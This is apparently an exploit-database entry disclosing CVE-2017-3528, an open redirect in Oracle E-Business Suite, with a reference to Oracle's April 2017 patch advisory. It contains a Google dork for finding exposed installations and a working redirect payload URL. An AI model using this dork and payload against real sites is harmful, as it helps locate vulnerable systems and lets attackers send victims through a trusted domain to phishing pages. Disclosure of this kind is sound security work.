21 lines
No EOL
864 B
Text
21 lines
No EOL
864 B
Text
# Exploit Title: Oracle E-Business suite Open Redirect
|
|
# Google Dork: inurl:OA_HTML/cabo/
|
|
# Date: April 2017
|
|
# Exploit Author: [author]
|
|
# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
|
|
# Software Link: [download link if available]
|
|
# Version: Oracle E-Business Suite (REQUIRED)
|
|
# Tested on: [relevant os]
|
|
# CVE : CVE-2017-3528
|
|
|
|
The exploit can be leveraged for an open redirect using the following
|
|
exploit path:
|
|
|
|
https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com
|
|
|
|
Oracle E-Business suite is vulnerable to an open redirect issue,
|
|
specifically the redirect parameter allows any domain to be supplied
|
|
and it will be rendered on the target's site.
|
|
|
|
Note I was also credited for this CVE, see the Oracle
|
|
CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html) |